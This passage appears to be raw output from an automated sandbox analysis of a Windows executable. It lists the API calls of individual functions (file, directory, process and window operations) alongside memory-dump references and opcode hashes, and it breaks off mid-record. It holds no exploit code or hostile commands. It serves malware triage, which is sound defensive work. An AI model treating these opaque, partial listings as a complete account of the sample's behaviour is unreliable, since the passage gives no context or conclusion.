                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                                                                                                                                                                                                      • Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalFree.KERNELBASE(0060B968), ref: 00401C0B
                                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                                                                                        • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                                                                                        • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AllocFreelstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: open
                                                                                                                                                                                                                                      • API String ID: 3292104215-2758837156
                                                                                                                                                                                                                                      • Opcode ID: 416e0808797b3da9c1fece3e967c8094de08963848feecb337ecbf82cdc503c9
                                                                                                                                                                                                                                      • Instruction ID: e925a152a6e0f7021576dd296752ea90fe74f89098b2d6bde03e837448aacd47
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 416e0808797b3da9c1fece3e967c8094de08963848feecb337ecbf82cdc503c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA213673904210EBD720AFA4DEC5E5E72A4EB08328715093BF552B72D1D6BCE8518B5D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00405B2D: ShellExecuteExW.SHELL32(?), ref: 00405B3C
                                                                                                                                                                                                                                        • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                                                                                                                                                                                                                        • Part of subcall function 0040697F: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069B2
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6A
                                                                                                                                                                                                                                      • @, xrefs: 00401F8A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                                                                                                                                                                                                      • String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                                                                      • API String ID: 165873841-1134175212
                                                                                                                                                                                                                                      • Opcode ID: 1f5917e33a56c947b6e5a947a7c5c6b6bc43c16b3be91fb6cacf00c248c14470
                                                                                                                                                                                                                                      • Instruction ID: e5fb9d027c761589e680b1257b4cadef509076267ccb1bc0e8fa647dfd1f3a7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f5917e33a56c947b6e5a947a7c5c6b6bc43c16b3be91fb6cacf00c248c14470
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C114971E042189ACB60EFB9CA49B8CB6F4AF08304F20457AE405F72D1EBBC89459B18
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069A5
                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNELBASE(?,?), ref: 004069B2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2567322000-0
                                                                                                                                                                                                                                      • Opcode ID: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
                                                                                                                                                                                                                                      • Instruction ID: 36eed24e95c07865df7b56cd3c3a37613c402ee52c1e894a6bace4c6932a2b17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4e22deffd65f84e370c04cbd1d88a1e749a9585608b68ea3518500749b930bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25E0D8B1600508FBDF109B55DD06E9E7B6EDB84700F110037F601B61A0C7B6AE61DBA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                                                                                                                                                                                                      • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$EnableShow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1136574915-0
                                                                                                                                                                                                                                      • Opcode ID: dc987a2418bededafa9039ccbb786b59f9cf8f416ed8c99e1cda5871faa3231f
                                                                                                                                                                                                                                      • Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc987a2418bededafa9039ccbb786b59f9cf8f416ed8c99e1cda5871faa3231f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                                                                                                                                                                                                        • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                                                                                        • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                                                                                        • Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                                                                                      • Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                                                                                                                                                                                                      • Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,004030BD,00438800,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                                      • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                      • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                      • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405AC9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                                                                      • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                      • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                      • Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                                                                                                                                                                                                                                      Memory Dump Source
